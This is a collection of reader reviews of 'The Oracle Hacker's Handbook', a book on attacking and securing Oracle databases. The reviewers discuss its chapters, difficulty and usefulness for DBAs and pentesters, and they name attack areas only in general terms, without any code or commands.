The Oracle Hacker's Handbook: Hacking and Defending Oracle

I've been doing some Oracle research and of course this is the only book on the market that really covers breaking into Oracle with the exception of The Database Hacker's Handbook which came out in 2005. Justin Clark's (and others) SQL Injection Book published in 2009 also covers some Oracle material but not enough to make this book obsolete. I bought this book immediately when it came out in 2007 (yeah I'm super late on the review) but frankly put it down because it was confusing and definitely not suited for anyone that didn't already have a basic exposure to Oracle. I picked it up again in late 2008 after doing the background research on Oracle security and administration. Armed with a better understanding of Oracle in general I attacked the book again, focusing on SQL Injection in the Oracle PL/SQL packages with the goal of going from locating an open TNS listener to getting a shell on the system. The author is well known in the security industry and one of only a handful of Oracle Security "experts", so the skill level was definitely there. Breakdown of the Chapters: Introduction. Chapter 1 Overview of the Oracle RDBMS. Chapter 2 The Oracle Network Architecture. Chapter 3 Attacking the TNS Listener and Dispatchers. Chapter 4 Attacking the Authentication Process. Chapter 5 Oracle and PL/SQL. Chapter 6 Triggers. Chapter 7 Indirect Privilege Escalation. Chapter 8 Defeating Virtual Private Databases. Chapter 9 Attacking Oracle PL/SQL Web Applications. Chapter 10 Running Operating System Commands. Chapter 11 Accessing the File System. Chapter 12 Accessing the Network. Appendix A Default Usernames and Passwords. I think most of the background chapters are "adequate" and the exploitation chapters are very good. At the time of publishing the author released code for vulnerabilities that were brand new. I do have issues with Chapter 5 Oracle and PL/SQL. I think the coverage of PL/SQL is only adequate if you already know PL/SQL. It took me going and reading a lot of other material on the net about PL/SQL to understand things that are glossed over in the chapter. The chapter is good and covers tons of material but from an attacking Oracle perspective more time should have been spent on teaching the reading how to use the "describe" package option in PL/SQL to describe the package to learn how to craft your queries correctly as well as how to research and write your own SQL Injection queries based on published vulnerabilities. More coverage on default privileges and roles would have been useful as well. Again, if you have been an Oracle DBA, you understand this already. If you are an Oracle security researchers you know this already. If you are a pentester trying to get some Oracle under your belt you'll have to go pick up another book or hit the internet to get the background material. The other chapters are good and they cover their stated topics. More examples would have been nice of course. A couple of times we are told to check out

I found this book to be an excellent resource, and use it quite often at work.

Have just read this book this week and it was a nice read, especialy after some of the c***p I have been reading lately! Basicaly - If your systems estate has Oracle - Then you MUST read this. I like this book, its good and the author really does know his stuff - its a light weight (easy to carry) book and good value for money Some nice C / Java Snipets - so it helps if you know C.

When I have started with this book I was amazed and afraid both. By this book all those tricks of SQL injections in Oracle has started to be a public knowledge. So this book is like a knife... you can cut the bread or you can kill with it. :) But let's be honest. It is always better to know especially when you are DBA, because of you are always far behind the attackers who probably spend their lifetime on browsing the code for security flaws. For that reason everyone how is responsible for practical Oracle security should read this book and learn how to defend. I belive that this book will grow in the future and will provide more & more examples. That is the game we use to play. New releases, new bugs, new flaws, new workarounds and finally some vendor final fixes. That is how oracle security process cycle should work. It is worth to be mentioned that in terms of quality, David Litchfield has started completly new period in cycle.

The Oracle Hacker's Handbook (OHH) is a collection of techniques that could be used by an attacker to gain unauthorised access to an Oracle database server upto and including 10gR2. Most of these techniques are currently not public, so OHH is both new knowledge for an attacker and vital warning to those responsible for securing Oracle servers. In a nutshell the new attacks include how to gain the version number remotely, brute force usernames, gain passwords/hashes from the OS, attack the listener, escalate privilege internally through PLSQL Packages and Triggers both directly and indirectly as well as defeating VPD. These attacks are illustrated both directly and through application server. By using these techniques and by accessing the Oracle files directly through the OS an attacker would be able to gain DBA privileges on most secured servers. Additionally using the code examples included an attacker could gain password hashes and then the actual DBA clear text password from the network using the password decryption code included. This will work even with complex quoted passwords. This is the most effective public analysis of security vulnerabilities in Oracle products so far. OHH is a technical book and not really an introduction to the subject though it could be picked up reasonably quickly as the text avoids unnecessary jargon. The book could be enhanced by including more on defense strategies, such as, how to prepare and respond to an attack where the attacker has gained the clear text DBA password. OHH has a free download site for pre-written proof of concept code which will helps avoid unnecessary typing. From a general readability point of view the book is concise and to the point. The sections are logically laid out and the examples have worked when tested. I would recommend those involved in Oracle security to read this book as soon as they can.